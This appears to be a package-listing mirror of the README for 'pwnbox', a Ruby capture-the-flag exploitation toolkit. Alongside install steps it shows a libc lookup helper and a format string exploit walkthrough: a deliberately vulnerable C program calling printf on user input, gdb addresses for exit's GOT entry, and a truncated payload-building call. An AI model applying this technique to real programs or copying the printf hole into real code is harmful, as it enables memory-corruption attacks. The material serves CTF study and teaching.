https://github.com/yous/jakkdu-pwnbox

Capture-The-Flag(CTF) toolkit
https://github.com/yous/jakkdu-pwnbox

Last synced: 2 months ago
JSON representation

Capture-The-Flag(CTF) toolkit

• Host: GitHub
• URL: https://github.com/yous/jakkdu-pwnbox
• Owner: yous
• License: mit
• Created: 2014-12-16T05:50:57.000Z (over 10 years ago)
• Default Branch: master
• Last Pushed: 2014-12-20T04:39:05.000Z (over 10 years ago)
• Last Synced: 2025-02-10T21:19:05.370Z (4 months ago)
• Language: Ruby
• Homepage:
• Size: 2.62 MB
• Stars: 0
• Watchers: 3
• Forks: 1
• Open Issues: 0
• Metadata Files:
  • Readme: README.md
  • License: LICENSE.txt

Awesome Lists containing this project

README

        
# Pwnbox

[![Build Status](https://travis-ci.org/jakkdu/pwnbox.svg?branch=master)](https://travis-ci.org/jakkdu/pwnbox)

Capture-The-Flag(CTF) toolkit

## Installation

Add this line to your application's Gemfile:

    gem 'pwnbox'

And then execute:

    $ bundle

Or install it yourself as:

    $ gem install pwnbox

## Usage

### Find a libc.so

```ruby

libc = Pwnbox::Pwnable.find_libc(['system', 0x40100])

puts "Path : #{libc.path}"

puts "Read address : 0x%08X" % libc.find_address_by_name('read')

```

### Format string bug

An example is following.

```c

#include 

#include 

#include 

int main(int argc, char** argv)

{

    char buf[0x100];

    strncpy(buf, argv[1], 40);

    printf(buf);

    exit(-1);

}

```

Get exploit parameters using gdb.

```shell

=> 0x080484c7 <+74>:    call   0x8048330 

(gdb) x/i 0x8048350

   0x8048350 :        jmp    *0x804a014

(gdb) x/x $esp

0xbffff2f0:     0xbffff30c

```

exit GOT : 0x804a014, buffer : 0xbffff30c, esp : 0xbffff2e0

```ruby

Pwnbox::Pwnable.fsb(0x804a014, 0xbffff30c - 0xbffff2f0, [0xdeadbeef].pack('